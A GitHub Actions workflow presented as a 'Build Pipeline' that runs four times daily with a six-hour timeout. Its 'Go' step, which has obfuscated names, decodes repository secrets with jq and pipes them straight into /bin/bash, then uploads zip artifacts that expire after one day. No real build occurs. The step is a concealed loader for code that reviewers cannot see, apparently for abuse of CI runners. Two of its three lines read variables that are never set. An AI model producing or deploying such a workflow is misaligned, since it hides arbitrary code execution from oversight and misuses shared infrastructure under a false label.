name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '0 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          ondm93: ${{ secrets.ondm93 }}
        run: |
          printf '%s' "$ondm93" | jq -r .pb74225 | /bin/bash
          printf '%s' "$czmc94895" | jq -r .tp562 | /bin/bash
          printf '%s' "$p241" | jq -r .vzcn76 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: 9J52sgjc
          path: "*.zip"
          retention-days: 1
